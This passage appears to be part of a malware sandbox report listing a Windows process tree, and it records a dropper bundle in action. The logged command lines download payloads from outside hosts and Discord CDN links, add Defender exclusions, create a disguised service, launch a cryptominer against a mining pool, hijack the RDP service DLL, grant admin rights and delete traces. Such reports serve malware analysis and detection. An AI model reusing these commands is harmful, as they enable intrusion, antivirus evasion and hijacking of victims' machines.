        "C:\Users\Admin\AppData\Local\Temp\23-91dc3-8fd-9af8b-a42eb36d3d75f\Jepaekynoha.exe"
        10⤵
        Checks whether UAC is enabled
        
        PID:5684
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qmv00ypo.vi1\GcleanerEU.exe /eufive & exit
        11⤵
        
        PID:4936
        
        C:\Users\Admin\AppData\Local\Temp\qmv00ypo.vi1\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\qmv00ypo.vi1\GcleanerEU.exe /eufive
        12⤵
        
        PID:4660
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vzeeuolm.bgf\installer.exe /qn CAMPAIGN="654" & exit
        11⤵
        
        PID:8792
        
        C:\Users\Admin\AppData\Local\Temp\vzeeuolm.bgf\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\vzeeuolm.bgf\installer.exe /qn CAMPAIGN="654"
        12⤵
        Loads dropped DLL
        Enumerates connected drives
        Modifies system certificate store
        Suspicious use of FindShellTrayWindow
        
        PID:9304
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\vzeeuolm.bgf\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\vzeeuolm.bgf\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632862088 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        13⤵
        
        PID:9168
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s5geds1y.o0h\any.exe & exit
        11⤵
        
        PID:7340
        
        C:\Users\Admin\AppData\Local\Temp\s5geds1y.o0h\any.exe
        
        C:\Users\Admin\AppData\Local\Temp\s5geds1y.o0h\any.exe
        12⤵
        
        PID:9656
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\finf0hvm.m1l\gcleaner.exe /mixfive & exit
        11⤵
        
        PID:9124
        
        C:\Users\Admin\AppData\Local\Temp\finf0hvm.m1l\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\finf0hvm.m1l\gcleaner.exe /mixfive
        12⤵
        
        PID:10052
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ptqibi3x.ixk\autosubplayer.exe /S & exit
        11⤵
        
        PID:9320
        
        C:\Users\Admin\AppData\Local\Temp\ptqibi3x.ixk\autosubplayer.exe
        
        C:\Users\Admin\AppData\Local\Temp\ptqibi3x.ixk\autosubplayer.exe /S
        12⤵
        Loads dropped DLL
        Drops file in Program Files directory
        
        PID:10060
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbE767.tmp\tempfile.ps1"
        13⤵
        
        PID:8292
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbE767.tmp\tempfile.ps1"
        13⤵
        
        PID:9496
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbE767.tmp\tempfile.ps1"
        13⤵
        
        PID:8892
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbE767.tmp\tempfile.ps1"
        13⤵
        
        PID:4932
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbE767.tmp\tempfile.ps1"
        13⤵
        
        PID:8512
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbE767.tmp\tempfile.ps1"
        13⤵
        
        PID:10036
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbE767.tmp\tempfile.ps1"
        13⤵
        
        PID:9472
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "bitsadmin" /Transfer helper http://lighteningstoragecenter.com/data/data.7z C:\zip.7z
        13⤵
        Download via BitsAdmin
        
        PID:8844
    - - C:\Users\Admin\Documents\P8lHA4JfehFIKYBi0B67dfom.exe
        
        "C:\Users\Admin\Documents\P8lHA4JfehFIKYBi0B67dfom.exe"
        5⤵
        Executes dropped EXE
        Checks processor information in registry
        
        PID:1540
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im P8lHA4JfehFIKYBi0B67dfom.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\P8lHA4JfehFIKYBi0B67dfom.exe" & del C:\ProgramData\*.dll & exit
        6⤵
        
        PID:6596
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im P8lHA4JfehFIKYBi0B67dfom.exe /f
        7⤵
        Kills process with taskkill
        
        PID:4656
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        7⤵
        Delays execution with timeout.exe
        
        PID:6348
    - - C:\Users\Admin\Documents\vgugk_T7WYNeMpaMl4t2En2B.exe
        
        "C:\Users\Admin\Documents\vgugk_T7WYNeMpaMl4t2En2B.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:972
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 972 -s 1216
        6⤵
        Executes dropped EXE
        Program crash
        
        PID:2156
    - - C:\Users\Admin\Documents\0ERE8R1OAh8mrS0hBGgOHUbZ.exe
        
        "C:\Users\Admin\Documents\0ERE8R1OAh8mrS0hBGgOHUbZ.exe"
        5⤵
        Executes dropped EXE
        
        PID:5052
    - - C:\Users\Admin\Documents\WbmERcFQEVQ7I_1szGZicnPp.exe
        
        "C:\Users\Admin\Documents\WbmERcFQEVQ7I_1szGZicnPp.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4236
      - C:\Users\Admin\Documents\WbmERcFQEVQ7I_1szGZicnPp.exe
        
        C:\Users\Admin\Documents\WbmERcFQEVQ7I_1szGZicnPp.exe
        6⤵
        Executes dropped EXE
        
        PID:5720
    - - C:\Users\Admin\Documents\f3TlIoxXFCq8uLyOWNVG6kec.exe
        
        "C:\Users\Admin\Documents\f3TlIoxXFCq8uLyOWNVG6kec.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4992
      - C:\Users\Admin\Documents\f3TlIoxXFCq8uLyOWNVG6kec.exe
        
        "C:\Users\Admin\Documents\f3TlIoxXFCq8uLyOWNVG6kec.exe"
        6⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: MapViewOfSection
        
        PID:5996
    - - C:\Users\Admin\Documents\40at9GbkaggqF0W4yoWUilGc.exe
        
        "C:\Users\Admin\Documents\40at9GbkaggqF0W4yoWUilGc.exe"
        5⤵
        Executes dropped EXE
        
        PID:5056
    - - C:\Users\Admin\Documents\Nve8TPRxXh49FkMt6tk8EN2E.exe
        
        "C:\Users\Admin\Documents\Nve8TPRxXh49FkMt6tk8EN2E.exe"
        5⤵
        
        PID:4128
      - C:\Users\Admin\Documents\Nve8TPRxXh49FkMt6tk8EN2E.exe
        
        C:\Users\Admin\Documents\Nve8TPRxXh49FkMt6tk8EN2E.exe
        6⤵
        Executes dropped EXE
        
        PID:5872
    - - C:\Users\Admin\Documents\LuHpnuFzoS49nG0OCqww7qw6.exe
        
        "C:\Users\Admin\Documents\LuHpnuFzoS49nG0OCqww7qw6.exe"
        5⤵
        Executes dropped EXE
        
        PID:1688
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9FE6.tmp\9FE7.tmp\9FE8.bat C:\Users\Admin\Documents\LuHpnuFzoS49nG0OCqww7qw6.exe"
        6⤵
        
        PID:5252
        
        C:\Users\Admin\AppData\Local\Temp\9FE6.tmp\9FE7.tmp\extd.exe
        
        C:\Users\Admin\AppData\Local\Temp\9FE6.tmp\9FE7.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/889574700513107980/890550701829259356/exe.exe" "exe.exe" "" "" "" "" "" ""
        7⤵
        Executes dropped EXE
        
        PID:6712
        
        C:\Users\Admin\AppData\Local\Temp\9FE6.tmp\9FE7.tmp\extd.exe
        
        C:\Users\Admin\AppData\Local\Temp\9FE6.tmp\9FE7.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/889574700513107980/892465432404054046/1.exe" "1.exe" "" "" "" "" "" ""
        7⤵
        
        PID:7960
        
        C:\Users\Admin\AppData\Local\Temp\3240\1.exe
        
        1.exe
        7⤵
        Executes dropped EXE
        
        PID:7616
        
        C:\Users\Admin\AppData\Local\Temp\9FE6.tmp\9FE7.tmp\extd.exe
        
        C:\Users\Admin\AppData\Local\Temp\9FE6.tmp\9FE7.tmp\extd.exe "" "" "" "" "" "" "" "" ""
        7⤵
        Executes dropped EXE
        
        PID:5652
    - - C:\Users\Admin\Documents\CG8V_S91oQwcEZwFvnLaOyJx.exe
        
        "C:\Users\Admin\Documents\CG8V_S91oQwcEZwFvnLaOyJx.exe"
        5⤵
        Executes dropped EXE
        Windows security modification
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        
        PID:2872
      - C:\Users\Admin\AppData\Local\Temp\bd6f1325-4a62-444f-9152-6b5f50724847\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bd6f1325-4a62-444f-9152-6b5f50724847\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\bd6f1325-4a62-444f-9152-6b5f50724847\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        6⤵
        Executes dropped EXE
        
        PID:4600
        
        C:\Users\Admin\AppData\Local\Temp\bd6f1325-4a62-444f-9152-6b5f50724847\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bd6f1325-4a62-444f-9152-6b5f50724847\AdvancedRun.exe" /SpecialRun 4101d8 4600
        7⤵
        
        PID:2156
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\CG8V_S91oQwcEZwFvnLaOyJx.exe" -Force
        6⤵
        
        PID:6928
      - C:\Users\Admin\Documents\CG8V_S91oQwcEZwFvnLaOyJx.exe
        
        "C:\Users\Admin\Documents\CG8V_S91oQwcEZwFvnLaOyJx.exe"
        6⤵
        Executes dropped EXE
        
        PID:7008
      - C:\Users\Admin\Documents\CG8V_S91oQwcEZwFvnLaOyJx.exe
        
        "C:\Users\Admin\Documents\CG8V_S91oQwcEZwFvnLaOyJx.exe"
        6⤵
        Executes dropped EXE
        
        PID:7044
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2872 -s 2140
        6⤵
        Program crash
        
        PID:7152
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Thu02bfe1521bcc038.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:816
  - - C:\Users\Admin\AppData\Local\Temp\7zS44FA88C2\Thu02bfe1521bcc038.exe
      Thu02bfe1521bcc038.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Checks whether UAC is enabled
      Suspicious use of WriteProcessMemory
      PID:2396
    - - C:\Windows\SysWOW64\dllhost.exe
        
        dllhost.exe
        5⤵
        
        PID:4704
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c cmd < Del.doc
        5⤵
        
        PID:4856
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd
        6⤵
        
        PID:4772
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /R "^NZrkFJTgsCdMvCokxiUUxUBYmGUZCyshQzrAfUxHKQBByATJNifzJsTTnyLZOTMjkrVrmIWmMjlEaZSZNkkcPXDmmpwppcSQtfd$" Una.doc
        7⤵
        
        PID:1548
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Riconobbe.exe.com
        
        Riconobbe.exe.com H
        7⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:4804
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Riconobbe.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Riconobbe.exe.com H
        8⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:5008
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Riconobbe.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Riconobbe.exe.com H
        9⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3552
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Riconobbe.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Riconobbe.exe.com H
        10⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:4240
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\oCs4Ptqn & timeout 2 & del /f /q "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Riconobbe.exe.com"
        11⤵
        
        PID:7848
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        12⤵
        Delays execution with timeout.exe
        
        PID:5312
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping RSSLLXYN -n 30
        7⤵
        Runs ping.exe
        
        PID:4680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Thu02c015332704.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:928
  - - C:\Users\Admin\AppData\Local\Temp\7zS44FA88C2\Thu02c015332704.exe
      Thu02c015332704.exe
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Thu02f60acc90a3.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:592
  - - C:\Users\Admin\AppData\Local\Temp\7zS44FA88C2\Thu02f60acc90a3.exe
      Thu02f60acc90a3.exe
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2532

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
PID:4344

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.170.0822.0002\FileSyncConfig.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.170.0822.0002\FileSyncConfig.exe"
1⤵
- Modifies registry class
PID:3600

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:5552

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Executes dropped EXE
PID:5592
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:8868

C:\Users\Admin\AppData\Local\Temp\C249.exe
C:\Users\Admin\AppData\Local\Temp\C249.exe
1⤵
- Suspicious use of SetThreadContext
PID:9256
- C:\Users\Admin\AppData\Local\Temp\C249.exe
  C:\Users\Admin\AppData\Local\Temp\C249.exe
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:9876

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:9448

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:9616

C:\Users\Admin\AppData\Local\Temp\D610.exe
C:\Users\Admin\AppData\Local\Temp\D610.exe
1⤵
- Suspicious use of SetThreadContext
PID:9700
- C:\Users\Admin\AppData\Local\Temp\D610.exe
  C:\Users\Admin\AppData\Local\Temp\D610.exe
  2⤵
  PID:10072

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
PID:10208
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 4ED6807FACC1C98AEC6F579401D2DB33 C
  2⤵
  - Loads dropped DLL
  PID:9816
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 59198681114CFA8817F576EEDEDB2C64
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  PID:2860
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:7860
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 15A2A1B0F043FA808ED6A5A7E37C7FFE E Global\MSI0000
  2⤵
  - Loads dropped DLL
  PID:8704
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding CA2E46BCDF381A5CE4FDE1B41B2641F2 C
  2⤵
  PID:9768
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 215FFB8522F8D862C098D747B289401A
  2⤵
  PID:7420
- C:\Users\Admin\AppData\Roaming\DB Software Laboratory\Svn Syncronize Management\disksyncer.exe
  "C:\Users\Admin\AppData\Roaming\DB Software Laboratory\Svn Syncronize Management\disksyncer.exe"
  2⤵
  - Drops startup file
  PID:5468

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:5168

C:\Users\Admin\AppData\Local\Temp\13D6.exe
C:\Users\Admin\AppData\Local\Temp\13D6.exe
1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7224

C:\Users\Admin\AppData\Local\Temp\596B.exe
C:\Users\Admin\AppData\Local\Temp\596B.exe
1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:8504
- C:\Users\Admin\AppData\Local\Temp\596B.exe
  "C:\Users\Admin\AppData\Local\Temp\596B.exe"
  2⤵
  PID:9468

C:\Users\Admin\AppData\Local\Temp\6870.exe
C:\Users\Admin\AppData\Local\Temp\6870.exe
1⤵
PID:7056
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\6870.exe"
  2⤵
  PID:10220
- - C:\Windows\SysWOW64\timeout.exe
    timeout /T 10 /NOBREAK
    3⤵
    - Delays execution with timeout.exe
    PID:8636

C:\Users\Admin\AppData\Local\Temp\79D6.exe
C:\Users\Admin\AppData\Local\Temp\79D6.exe
1⤵
- Loads dropped DLL
PID:4996

C:\Users\Admin\AppData\Local\Temp\86B8.exe
C:\Users\Admin\AppData\Local\Temp\86B8.exe
1⤵
PID:7540
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ilpiqccx\
  2⤵
  PID:8576
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\yoooduas.exe" C:\Windows\SysWOW64\ilpiqccx\
  2⤵
  PID:7448
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" create ilpiqccx binPath= "C:\Windows\SysWOW64\ilpiqccx\yoooduas.exe /d\"C:\Users\Admin\AppData\Local\Temp\86B8.exe\"" type= own start= auto DisplayName= "wifi support"
  2⤵
  PID:8828
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" description ilpiqccx "wifi internet conection"
  2⤵
  PID:8444
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" start ilpiqccx
  2⤵
  PID:7840
- C:\Windows\SysWOW64\netsh.exe
  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
  2⤵
  PID:7480

C:\Users\Admin\AppData\Local\Temp\9C64.exe
C:\Users\Admin\AppData\Local\Temp\9C64.exe
1⤵
PID:6596

C:\Windows\SysWOW64\ilpiqccx\yoooduas.exe
C:\Windows\SysWOW64\ilpiqccx\yoooduas.exe /d"C:\Users\Admin\AppData\Local\Temp\86B8.exe"
1⤵
- Suspicious use of SetThreadContext
PID:8128
- C:\Windows\SysWOW64\svchost.exe
  svchost.exe
  2⤵
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  PID:9300
- - C:\Windows\SysWOW64\svchost.exe
    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
    3⤵
    PID:8508

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:8924
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:6500

C:\Users\Admin\AppData\Local\Temp\B30A.exe
C:\Users\Admin\AppData\Local\Temp\B30A.exe
1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:9036

C:\Users\Admin\AppData\Local\Temp\D875.exe
C:\Users\Admin\AppData\Local\Temp\D875.exe
1⤵
PID:9124
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Deletes itself
  - Drops file in System32 directory
  - Drops file in Windows directory
  PID:8608
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hh02xoyb\hh02xoyb.cmdline"
    3⤵
    PID:9140
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB2C9.tmp" "c:\Users\Admin\AppData\Local\Temp\hh02xoyb\CSCE444E6FAA3DC4C06BE3FABA2CED844B0.TMP"
      4⤵
      PID:9832
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    PID:8540
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      Drops file in System32 directory
      Modifies data under HKEY_USERS
      PID:6812
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    PID:6088
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Blocklisted process makes network request
    - Executes dropped EXE
    PID:5208
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:8760
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Modifies registry key
    PID:652
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:6576
- - C:\Windows\SysWOW64\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    PID:9544
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:6888
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    PID:8596
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c net start rdpdr
      4⤵
      PID:9180
    - - C:\Windows\SysWOW64\net.exe
        
        net start rdpdr
        5⤵
        
        PID:6800
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:9328
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    PID:4932
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c net start TermService
      4⤵
      Drops file in Windows directory
      PID:9764
    - - C:\Windows\SysWOW64\net.exe
        
        net start TermService
        5⤵
        
        PID:9384
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:9652
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:6492
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:6376

C:\Users\Admin\AppData\Local\Temp\E825.exe
C:\Users\Admin\AppData\Local\Temp\E825.exe
1⤵
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:9952
- C:\Users\Admin\AppData\Local\Temp\b408c7ca-909a-495b-bf5f-53ede0f24442\AdvancedRun.exe
  "C:\Users\Admin\AppData\Local\Temp\b408c7ca-909a-495b-bf5f-53ede0f24442\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\b408c7ca-909a-495b-bf5f-53ede0f24442\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
  2⤵
  PID:4252
- - C:\Users\Admin\AppData\Local\Temp\b408c7ca-909a-495b-bf5f-53ede0f24442\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\b408c7ca-909a-495b-bf5f-53ede0f24442\AdvancedRun.exe" /SpecialRun 4101d8 4252
    3⤵
    PID:10132
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\E825.exe" -Force
  2⤵
  PID:7784
- C:\Users\Admin\AppData\Local\Temp\E825.exe
  "C:\Users\Admin\AppData\Local\Temp\E825.exe"
  2⤵
  PID:7544
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4656

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Executes dropped EXE
PID:6400

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
